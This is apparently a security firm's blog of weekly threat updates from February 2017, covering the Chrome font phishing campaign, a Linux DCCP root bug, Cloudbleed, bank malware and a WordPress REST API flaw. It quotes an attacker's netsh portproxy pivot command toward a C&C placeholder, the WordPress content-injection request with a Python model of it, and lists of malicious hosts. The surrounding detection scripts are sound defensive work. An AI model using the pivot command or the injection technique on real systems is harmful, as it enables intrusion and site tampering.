Saturday, February 25, 2017

Cyber Updates - 25/02

Hey all,

Here are this week's cyber updates:

(1) A new phishing campaign targeting Google Chrome users was recently discovered.
The campaign lures users into downloading a fake font update which installs malware rather than a font. The attackers first compromise legitimate websites (for example through the WordPress REST API content injection vulnerability reported three weeks ago) and inject script that makes the page render as unreadable characters. The page then "offers" to fix the display by having the visitor update their "Chrome font pack" (the dialog claims the "HoeflerText" font was not found).

Once the download is run, the victim's machine is compromised. What is interesting about this attack is that the prompt looks legitimate: it mimics Chrome's own UI.

Sophisticated as it is, the attack makes the following mistakes:
1. The dialog shows a hard-coded Chrome version (53) instead of the version actually installed.
2. The dialog tells the user to download Chrome_Font.exe, whereas the file actually served is Chrome Font v7.5.1.exe

Such mistakes are easy for the attackers to fix, so users should not rely on spotting them: never install a font (or any other "update") because a website asks for it. Chrome never prompts to download fonts, and a page that renders as garbage should simply be closed.

Here are all the details:
https://neosmart.net/blog/2017/beware-of-this-new-chrome-font-wasnt-found-hack/

(2) The Linux kernel was found to contain yet another decade-old local privilege escalation vulnerability (CVE-2017-6074).
While Dirty COW (introduced in 2007) was discovered less than half a year ago, security researcher Andrey Konovalov has now found an even older bug, present since kernel 2.6.14 (2005).
The vulnerability is a use-after-free in the kernel's DCCP protocol implementation (a socket buffer is freed twice), which a local unprivileged user who can create a DCCP socket can exploit to corrupt kernel memory and gain root.

Organizations are advised to update their kernel as soon as possible. Where a reboot cannot be scheduled immediately, a practical mitigation is to prevent the dccp module from being loaded (a line such as install dccp /bin/true in a file under /etc/modprobe.d/), since almost nothing uses DCCP; note that this does not unload a module that is already loaded, so check lsmod and reboot if it is.

Here are all the details:
http://seclists.org/oss-sec/2017/q1/471
http://thehackernews.com/2017/02/linux-kernel-local-root.html

(3) A buffer overrun in Cloudflare's edge servers was reported (by Tavis Ormandy of Google Project Zero), causing responses to random visitors to include chunks of memory beyond the end of a buffer, which could contain other customers' sensitive data such as HTTP cookies, authentication tokens and POST bodies. The root cause was a bug in an HTML parser generated from a Ragel state machine and used to rewrite HTML (e-mail obfuscation, server-side excludes and automatic HTTPS rewrites): the end-of-buffer check compared the pointer with == instead of >=, so a page ending in an unterminated HTML tag pushed the parser past the end of its buffer and it kept reading from adjacent memory.
Because leaked data had already been cached by search engines, Cloudflare worked with them to purge those caches and waited several days before publishing the details of the vulnerability.
While the leaked memory could contain private information, the TLS private keys could not have been compromised by this bug, as they are held in a separate process.

Here are all the details:
https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/

Stay tuned for more updates,

Dan Gurfinkel
Head of Offensive Security & Response Unit

Saturday, February 18, 2017

Cyber Updates - 18/02

Hey all,
Here are this week's cyber updates:

(1) Microsoft did not publish its regular Patch Tuesday updates this month due to "a last minute issue that could impact some customers and was not resolved in time". This is presumably related to the SMB vulnerability (CVE-2017-0016) reported in the previous "cyber updates" post, which means Windows machines remain unpatched against a crash, and possibly code execution, triggered when they connect to a malicious SMB server.

Here are their details:
https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/

(2) Yahoo was hacked again. This is not the 2013 breach that was recently disclosed but a separate incident.
Instead of stealing (hashed) passwords, the attackers used forged cookies (according to Yahoo, crafted with the help of stolen proprietary code) to log in to victims' accounts without needing their passwords.

Here are all the details:
https://help.yahoo.com/kb/SLN27925.html?impressions=true

(3) Security researchers have shown that a website can identify a machine even when the visitor switches browsers. The site runs a set of tasks that measure the following features: time zone, number of CPU cores, GPU model, hashes of GPU rendering results, plugins, fonts, audio processing, screen ratio and colour depth, WebGL, ad blocking, canvas, cookies, encoding and language. Because many of these come from the operating system and hardware rather than the browser, they are identical across browsers on the same machine, and the researchers were able to identify 99.2% of users across browsers.

Here are all the details:
http://thehackernews.com/2017/02/cross-browser-tracking.html

Stay tuned for more updates,


Dan Gurfinkel
Head of Offensive Security & Response Unit

Saturday, February 11, 2017

Cyber Updates - 11/02

Hey all,
Here are this week's cyber updates:

(1) Microsoft Office lets document authors embed macros that run when the document is opened. While this is normally used for automation and calculations, attackers use it to run malicious code on their victims' workstations, in particular to install ransomware (such as Locky).
This week the first Word macro malware targeting macOS was found in the wild. The macro downloads a second stage from https://www.securitychecking.org/index.asp, decrypts it (the file is RC4-encrypted) and then executes the decrypted payload.

Organizations running macOS should check their DNS logs for any machine that has resolved the following malicious domain: www.securitychecking.org

(2) Banks worldwide have been targeted by malware that resides only in memory. Kaspersky's incident response team was called in after Meterpreter code was found in the memory of a bank's domain controller.
What is interesting about this attack is that the attackers used netsh.exe, a built-in Windows utility, to tunnel traffic from the victim's network to their C&C servers. In particular, the following command was used:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=<IP> connectport=8080 listenaddress=0.0.0.0

This makes the infected machine listen on port 4444 on all interfaces and forward whatever arrives there to port 8080 on <IP>.
A legitimate tool thus turned the domain controller into a pivot: internal workstations that are blocked from reaching the internet directly by the organization's firewall connect to the DC on port 4444, and the DC, which is allowed out, relays the traffic to the external C&C server. Because portproxy rules are stored in the registry, the relay also survives reboots.

Here are some Windows registry artifacts that will quickly allow an organization to determine whether one of its machines was affected (on a live host, netsh interface portproxy show all lists the active rules):

  • HKLM\SYSTEM\ControlSet001\services\ – new keys appear here after sc.exe is used to create a service
  • HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – values appear here after netsh.exe is used to add a portproxy rule
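To turn the two artifacts above into a check that can run over collected output, here is a small added example (my own code, not Kaspersky's or anything from the report) that parses both the table printed by netsh interface portproxy show all and the values under the PortProxy\v4tov4\tcp key as printed by reg query, and flags rules whose connect address lies outside the internal ranges. The sample outputs are constructed, and 203.0.113.10 is a documentation address standing in for the attacker's <IP>; the internal ranges are an assumption you should adjust to your own address plan.

```python
import ipaddress
import re

# Ranges an internal pivot is expected to forward to (assumed: RFC 1918, loopback,
# link-local). A connectaddress outside them is the pattern described above:
# internal listener -> external C&C.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_internal(addr):
    """True for addresses inside INTERNAL_NETS; hostnames (not parseable) count as external."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def parse_portproxy_show(text):
    """Parse the table printed by 'netsh interface portproxy show all' into
    (listen_addr, listen_port, connect_addr, connect_port) tuples."""
    rules = []
    for line in text.splitlines():
        parts = line.split()
        # Data rows have exactly four columns with numeric ports; headers and
        # separator lines do not.
        if len(parts) != 4 or not (parts[1].isdigit() and parts[3].isdigit()):
            continue
        rules.append((parts[0], int(parts[1]), parts[2], int(parts[3])))
    return rules


# One registry value per rule: name is <listenaddress>/<listenport>,
# data is <connectaddress>/<connectport>, type REG_SZ.
REG_VALUE = re.compile(r"^\s*(\S+)/(\d+)\s+REG_SZ\s+(\S+)/(\d+)\s*$")


def parse_portproxy_reg(text):
    r"""Parse the output of
    'reg query HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
    into the same tuple form as parse_portproxy_show."""
    rules = []
    for line in text.splitlines():
        m = REG_VALUE.match(line)
        if m:
            rules.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rules


def suspicious_rules(rules):
    """Rules that relay traffic accepted on this host to a non-internal target."""
    return [r for r in rules if not is_internal(r[2])]


# Constructed sample output: one benign internal forward and one pivot to the outside.
SAMPLE_NETSH = """\
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
127.0.0.1       8443        10.0.0.5        443
0.0.0.0         4444        203.0.113.10    8080
"""

SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
    127.0.0.1/8443    REG_SZ    10.0.0.5/443
    0.0.0.0/4444    REG_SZ    203.0.113.10/8080
"""

if __name__ == "__main__":
    for source, rules in (("netsh", parse_portproxy_show(SAMPLE_NETSH)),
                          ("registry", parse_portproxy_reg(SAMPLE_REG))):
        for listen_addr, listen_port, connect_addr, connect_port in suspicious_rules(rules):
            print("%s: %s:%d -> %s:%d forwards to an external host"
                  % (source, listen_addr, listen_port, connect_addr, connect_port))
```

Run it against the saved output of either command from each host; the registry form is the one to use when collecting offline (for example from a forensic image), since it survives reboots and does not depend on the service being up.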

(3) This has not been the best week for banks' cyber security. Several Polish banks were compromised, and the interesting part is that the infection came from the website of KNF, the Polish Financial Supervision Authority, which regulates the country's banks. Someone compromised KNF's website and modified a JavaScript file so that it served malicious code to visitors (a watering-hole attack).

Organizations are advised to block access to the following hosts and to check their logs for past connections to them:
  • sap.misapor.ch
  • www.eye-watch.in
  • 125.214.195.17
  • 196.29.166.218
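Items (1) and (3) both end with the same task: sweep DNS and firewall logs for a handful of indicators. Here is an added example of that sweep (my own code, not from either report), which matches hostnames exactly or as subdomains of an indicator (so cdn.sap.misapor.ch counts, notsap.misapor.ch does not), matches IPs only as whole dotted quads, and groups hits by the internal client. The log lines are constructed in BIND query-log and iptables-style formats; the client extraction (client x.x.x.x or src=x.x.x.x) is an assumption to adapt to your own log sources.

```python
import re
from collections import defaultdict

# Indicators from the two items above: the macOS macro's download host and the KNF
# watering-hole hosts and IPs.
IOC_HOSTS = {"www.securitychecking.org", "sap.misapor.ch", "www.eye-watch.in"}
IOC_IPS = {"125.214.195.17", "196.29.166.218"}

HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# Assumed client fields: 'client x.x.x.x' (BIND) or 'src=x.x.x.x' (iptables/ufw).
CLIENT_RE = re.compile(r"(?:client |src=)(\d{1,3}(?:\.\d{1,3}){3})")


def ioc_hits(line):
    """Return the set of indicators present in one log line."""
    hits = set()
    for host in HOST_RE.findall(line):
        h = host.lower().rstrip(".")
        # Exact match or a subdomain of an indicator; a mere suffix match
        # (notsap.misapor.ch) must not count, hence the leading dot.
        if h in IOC_HOSTS or any(h.endswith("." + ioc) for ioc in IOC_HOSTS):
            hits.add(h)
    hits.update(ip for ip in IP_RE.findall(line) if ip in IOC_IPS)
    return hits


def scan(lines):
    """Map each internal client to the indicators it touched ('unknown' when the
    line carries no client field)."""
    report = defaultdict(set)
    for line in lines:
        hits = ioc_hits(line)
        if hits:
            m = CLIENT_RE.search(line)
            report[m.group(1) if m else "unknown"].update(hits)
    return dict(report)


# Constructed sample: two infected clients among normal traffic.
LOG_SAMPLE = """\
Feb  8 09:12:41 dns1 named[812]: client 10.1.20.17#53311 (www.securitychecking.org): query: www.securitychecking.org IN A + (10.1.20.1)
Feb  8 09:12:44 dns1 named[812]: client 10.1.20.17#53312 (www.google.com): query: www.google.com IN A + (10.1.20.1)
Feb  8 09:13:02 fw1 kernel: ACCEPT src=10.1.30.5 dst=196.29.166.218 proto=TCP dpt=443
Feb  8 09:13:09 dns1 named[812]: client 10.1.30.5#40022 (cdn.sap.misapor.ch): query: cdn.sap.misapor.ch IN A + (10.1.20.1)
Feb  8 09:14:00 dns1 named[812]: client 10.1.40.9#40100 (mail.example.com): query: mail.example.com IN A + (10.1.20.1)
"""

if __name__ == "__main__":
    for client, indicators in sorted(scan(LOG_SAMPLE.splitlines()).items()):
        print("%s contacted: %s" % (client, ", ".join(sorted(indicators))))
```

Feed it the real logs with a file iterator instead of LOG_SAMPLE; a client that appears in the output has at least resolved or connected to an indicator and should be triaged, even if the block on the firewall was already in place.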

(4) Last week I mentioned the ransomware that hit a hotel in Austria; this week it was IHG's turn to be infected by malware. Point-of-sale systems at about a dozen InterContinental properties were compromised, allowing the attackers to harvest payment card data.

The following link lists all affected properties: https://www.ihg.com/content/us/en/customer-care/protecting-our-guests. Be sure to check whether you purchased anything there!

(5) 76 popular iOS applications were found to be vulnerable to man-in-the-middle attacks because they accept invalid TLS certificates. Some are very popular, such as Snapchat. An attacker on the same network (public Wi-Fi, for example) can intercept the apps' traffic and steal your credentials (username and password).

Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Friday, February 3, 2017

Cyber Updates - 03/02

Hey all,
Here are this week’s cyber updates.

(1) Windows 8.1 and 10 (and the corresponding server releases) are vulnerable to a memory corruption bug (CVE-2017-0016) in the SMB client: a malicious SMB server can return a malformed SMB2 TREE_CONNECT response that crashes the connecting machine (BSOD) and could possibly allow code execution on it. Note that this is triggered by connecting to a malicious server, not by incoming connections.
Microsoft has yet to issue a fix for this vulnerability, and a proof-of-concept exploit has been published.
Please restrict outbound SMB traffic (TCP 139 and 445, UDP 137 and 138) from the internal network to the internet at the firewall until a patch is issued by Microsoft.

Here are all the details:


(2) Guests of the Romantik Seehotel Jägerwirt were reportedly unable to get into their rooms because their keycards no longer worked, and some guests' reservations vanished from the system. The computers running the electronic key-lock system had been infected with ransomware.

If you ask me, this just shows the difference between a generic attack and a target-driven approach. The attackers could easily have collected all guests' credit card details for years, earning far more than the ransom paid (1,500 EUR).

In this case the hotel had to pay the ransom ASAP, as any alternative would have meant very unhappy guests. But I guess they are already used to it, as the very same hotel had been hacked three times before this incident.
Now you would think the hotel would want to protect its systems and prevent such an incident from reoccurring. Well, the management found a rather "creative" solution: they are considering switching back to physical keys and locks instead of keycards and electronic locks.

Here are all the details:

(3) WordPress patched several vulnerabilities, one of which it deliberately kept out of the release notes for a week so that sites could update first. The bug was in the REST API added in 4.7 and allowed unauthenticated privilege escalation and content injection: any visitor could modify any post or page on a site running 4.7.0 or 4.7.1.
In particular, a request to /wp-json/wp/v2/posts/123?id=456ABC passes id in the query string, which overrides the numeric id matched from the route. The permission check looks up post "456ABC", finds nothing (post ids are numeric) and only denies access when a post is found and the user may not edit it, so the miss falls through and the request is allowed. WordPress then calls update_item, which casts the parameter to an int, turning "456ABC" into 456, and updates post 456, a valid and existing post. The fix in 4.7.2 canonicalises the id once and returns an error for anything that does not resolve to an existing post before the permission check runs.
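The pattern is worth seeing in code, because it is a general one (authorisation performed on one interpretation of the input, the action on another). The following is an added Python model of the flow described above, not WordPress's PHP; php_int_cast reproduces how PHP's (int) cast turns "456ABC" into 456, the post store and the rest_* error names are constructed, and the hardened version is one sound way to write it rather than the exact 4.7.2 patch.

```python
import re

# Constructed post store: only post 456 exists, owned by "alice".
POSTS = {456: {"title": "Welcome", "author": "alice"}}


def php_int_cast(value):
    """Model PHP's (int) cast on a string: the leading integer if there is one,
    otherwise 0, so (int)"456ABC" == 456. This lossy conversion is the crux of the bug."""
    m = re.match(r"\s*([+-]?\d+)", str(value))
    return int(m.group(1)) if m else 0


def get_post(post_id):
    """Stand-in for the lookup used by the permission check: an id that is not a
    plain integer does not resolve to any post."""
    if not re.fullmatch(r"\d+", str(post_id)):
        return None
    return POSTS.get(int(post_id))


def can_edit(user, post):
    return user is not None and user == post["author"]


def update_item_vulnerable(user, request):
    """Modelled on the 4.7.0/4.7.1 flow: the check only denies when a post was found
    AND the user may not edit it, so a lookup miss falls through as allowed."""
    post = get_post(request["id"])
    if post and not can_edit(user, post):
        return (403, "rest_cannot_edit")
    # Use site: the id is cast to int before the second lookup, so "456ABC" -> 456.
    post_id = php_int_cast(request["id"])
    post = POSTS.get(post_id)
    if post is None:
        return (404, "rest_post_invalid_id")
    post["title"] = request["title"]
    return (200, "updated post %d" % post_id)


def update_item_fixed(user, request):
    """Hardened flow: canonicalise the id once, reject anything that is not a positive
    integer or does not resolve, and authorise the very object that is later modified,
    so nothing can differ between the check and the use."""
    raw = str(request["id"])
    if not re.fullmatch(r"[1-9]\d*", raw):
        return (404, "rest_post_invalid_id")
    post = POSTS.get(int(raw))
    if post is None:
        return (404, "rest_post_invalid_id")
    if not can_edit(user, post):
        return (403, "rest_cannot_edit")
    post["title"] = request["title"]
    return (200, "updated post %s" % raw)


if __name__ == "__main__":
    anon = None  # unauthenticated visitor
    print(update_item_vulnerable(anon, {"id": "456", "title": "pwned"}))     # denied
    print(update_item_vulnerable(anon, {"id": "456ABC", "title": "pwned"}))  # post 456 defaced
    print(update_item_fixed(anon, {"id": "456ABC", "title": "pwned"}))       # rejected
```

The takeaway for code review: a permission check that answers "allowed" when it cannot find the object is a fail-open check, and any conversion applied to an identifier after authorisation (casts, trimming, case folding, normalisation) must be applied before it, or the check is protecting a different object than the one being changed.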

Here are all the details:

(4) Netgear routers were found to contain vulnerabilities, including an unauthenticated password disclosure, affecting 31 different models. While by default the admin interface is not reachable from the internet, anyone on the local network can use the flaw to take over the router, which could let a malicious entity build a large botnet for DDoS attacks or conduct MitM attacks against the router's users. Think about that the next time you connect to a coffee shop's Wi-Fi network.

Here are the details:

Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Thursday, February 2, 2017

New Official PCI SSC Guidelines - “Best Practices for Securing E-commerce”

The new PCI SIG guidance, “Best Practices for Securing E-commerce”, was published several days ago.

The SIGs (Special Interest Groups) are a formal PCI SSC program that allows QSAs, merchants, vendors and basically every member of the PCI community to work together and contribute on specific PCI areas that require clarification or additional guidance.

The SIGs always contain valuable information and are one of the best ways to keep close to the PCI SSC, anticipate trends and be a few steps ahead of our clients.

I have included here the new supplement and also the email from Troy Leach (PCI SSC's CTO) that I received, along with all of the SIG participants, to show the spirit and team effort that went into this one.

You can see that Comsec is, as always, credited and acknowledged inside the published document for its contribution and participation.

Nadav.

Nadav Shatz, PCI QSA  
Managing Director
T: +44 (0)203 463 8727 I M: +44 (0)7788 533 344